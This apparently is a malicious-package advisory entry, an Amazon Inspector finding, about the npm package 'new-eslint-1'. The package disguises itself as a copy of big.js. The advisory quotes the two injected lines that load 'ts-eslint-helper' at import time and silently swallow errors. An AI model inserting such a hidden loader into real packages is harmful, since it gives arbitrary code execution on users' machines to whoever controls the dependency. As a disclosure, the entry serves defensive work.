MAL-2026-6225

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7752e7f074edbf8521da2ee0b7c68c28a2f76d86576138df8f18e08aaa3a5c38) Package is published as 'new-eslint-1' but its package.json description, README, repository URL (MikeMcl/big.js), and source are a verbatim copy of big.js v7.0.1 — there is no ESLint functionality. Two lines have been injected at module top level in both big.js and big.mjs (lines 605-606): `const helper = require("ts-eslint-helper"); helper.from_str().then(e => e).catch(e => { });`. Because package.json declares `"main": "big.js"`, any `require('new-eslint-1')` synchronously loads the external `ts-eslint-helper` package and invokes `helper.from_str()` in the consumer's Node process, with errors silently swallowed. The required module name (`ts-eslint-helper`) does not match the only declared dependency (`eslint-helper-1@5.0.4`), so the loader is designed to fire when `ts-eslint-helper` resolves transitively or via a sibling install in a monorepo / polluted registry — and to fail silently otherwise, hiding the attempt from observers. This combines namespace deception (eslint-themed name + big.js disguise) with import-time arbitrary code execution under the control of whoever publishes ts-eslint-helper.